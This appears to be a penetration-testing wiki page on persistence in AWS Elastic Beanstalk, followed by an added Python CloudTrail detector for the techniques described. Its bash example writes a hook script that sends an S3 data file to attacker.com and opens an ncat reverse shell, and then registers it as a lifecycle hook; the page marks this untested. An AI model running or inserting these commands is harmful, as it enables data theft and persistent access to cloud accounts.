AWS - Elastic Beanstalk Persistence
{{#include ../../../../banners/hacktricks-training.md}}
Elastic Beanstalk
For more information check:
{{#ref}} ../../aws-services/aws-elastic-beanstalk-enum.md {{#endref}}
Persistence in Instance
To maintain persistence inside the AWS account, some persistence mechanism could be introduced inside the instance (cron job, ssh key...) so that the attacker can access it and steal the IAM role credentials from the metadata service.
Backdoor in Version
An attacker could backdoor the code inside the S3 repo so that it always executes both their backdoor and the expected code.
New backdoored version
Instead of changing the code of the actual version, the attacker could deploy a new backdoored version of the application.
Abusing Custom Resource Lifecycle Hooks
Note
TODO: Test
Elastic Beanstalk provides lifecycle hooks that allow you to run custom scripts during instance provisioning and termination. An attacker could configure a lifecycle hook to periodically execute a script that exfiltrates data or maintains access to the AWS account.
```bash
# Attacker creates a script that exfiltrates data and maintains access
echo '#!/bin/bash
aws s3 cp s3://sensitive-data-bucket/data.csv /tmp/data.csv
gzip /tmp/data.csv
curl -X POST --data-binary "@/tmp/data.csv.gz" https://attacker.com/exfil
ncat -e /bin/bash --ssl attacker-ip 12345' > stealthy_lifecycle_hook.sh

# Attacker uploads the script to an S3 bucket
aws s3 cp stealthy_lifecycle_hook.sh s3://attacker-bucket/stealthy_lifecycle_hook.sh

# Attacker modifies the Elastic Beanstalk environment configuration to include the custom lifecycle hook
echo 'Resources:
  AWSEBAutoScalingGroup:
    Metadata:
      AWS::ElasticBeanstalk::Ext:
        TriggerConfiguration:
          triggers:
            - name: stealthy-lifecycle-hook
              events:
                - "autoscaling:EC2_INSTANCE_LAUNCH"
                - "autoscaling:EC2_INSTANCE_TERMINATE"
              target:
                ref: "AWS::ElasticBeanstalk::Environment"
                arn:
                  Fn::GetAtt:
                    - "AWS::ElasticBeanstalk::Environment"
                    - "Arn"
  stealthyLifecycleHook:
    Type: AWS::AutoScaling::LifecycleHook
    Properties:
      AutoScalingGroupName:
        Ref: AWSEBAutoScalingGroup
      LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING
      NotificationTargetARN:
        Ref: stealthy-lifecycle-hook
      RoleARN:
        Fn::GetAtt:
          - AWSEBAutoScalingGroup
          - Arn' > stealthy_lifecycle_hook.yaml

# Attacker applies the new environment configuration
aws elasticbeanstalk update-environment --environment-name my-env --option-settings Namespace="aws:elasticbeanstalk:customoption",OptionName="CustomConfigurationTemplate",Value="stealthy_lifecycle_hook.yaml"
```
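From the defender's side, each technique on this page leaves a CloudTrail record. The following is an added example (not part of the original page) that flags those records when they come from a principal outside a deploy allowlist. The allowlist, the principals and the sample records are constructed; the `elasticbeanstalk-` bucket prefix and `awseb-` Auto Scaling group prefix are assumed to be the Beanstalk default names, and S3 `PutObject` only appears if data events are enabled on the trail.

```python
# Assumption: the only principal expected to deploy. Replace with your pipeline role(s).
TRUSTED = {"arn:aws:sts::111111111111:assumed-role/ci-deploy/pipeline"}
EB, S3, ASG = ("elasticbeanstalk.amazonaws.com", "s3.amazonaws.com",
               "autoscaling.amazonaws.com")

def rec(time, arn, source, name, **params):
    """Build a constructed CloudTrail record holding only the fields used below."""
    return {"eventTime": time, "userIdentity": {"arn": arn}, "eventSource": source,
            "eventName": name, "requestParameters": params}

CI = "arn:aws:sts::111111111111:assumed-role/ci-deploy/pipeline"
DEV = "arn:aws:iam::111111111111:user/dev-laptop"  # constructed principal
SAMPLE_EVENTS = [  # constructed sample data, not real logs
    rec("2024-05-01T10:00:00Z", CI, EB, "CreateApplicationVersion", versionLabel="v42"),
    rec("2024-05-02T03:10:00Z", DEV, S3, "PutObject",
        bucketName="elasticbeanstalk-us-east-1-111111111111", key="shop/v42.zip"),
    rec("2024-05-02T03:12:00Z", DEV, EB, "CreateApplicationVersion", versionLabel="v43"),
    rec("2024-05-02T03:15:00Z", DEV, EB, "UpdateEnvironment", environmentName="my-env"),
    rec("2024-05-02T03:16:00Z", DEV, ASG, "PutLifecycleHook",
        autoScalingGroupName="awseb-e-abc123-stack-AWSEBAutoScalingGroup-XYZ",
        lifecycleHookName="stealthy-lifecycle-hook"),
    rec("2024-05-02T04:00:00Z", DEV, S3, "PutObject", bucketName="team-reports", key="q1.csv"),
]

def classify(event):
    """Return a finding for a record that matches one of the page's techniques, else None."""
    if event["userIdentity"]["arn"] in TRUSTED:
        return None
    src, name = event["eventSource"], event["eventName"]
    p = event.get("requestParameters") or {}
    if src == S3 and name == "PutObject" and p.get("bucketName", "").startswith("elasticbeanstalk-"):
        return f"source bundle written: s3://{p['bucketName']}/{p.get('key')}"
    if src == EB and name == "CreateApplicationVersion":
        return f"new application version: {p.get('versionLabel')}"
    if src == EB and name == "UpdateEnvironment":
        return f"environment updated: {p.get('environmentName')}"
    if src == ASG and name == "PutLifecycleHook" and p.get("autoScalingGroupName", "").startswith("awseb-"):
        return f"lifecycle hook added: {p.get('lifecycleHookName')}"
    return None

def findings(events):
    """Return (time, principal, finding) for every flagged record, in input order."""
    return [(e["eventTime"], e["userIdentity"]["arn"], f)
            for e in events if (f := classify(e))]

if __name__ == "__main__":
    for row in findings(SAMPLE_EVENTS):
        print(*row, sep="  ")
```

The allowlist only covers who deployed, not what was deployed, so a compromised pipeline role still needs a separate integrity check on the source bundle.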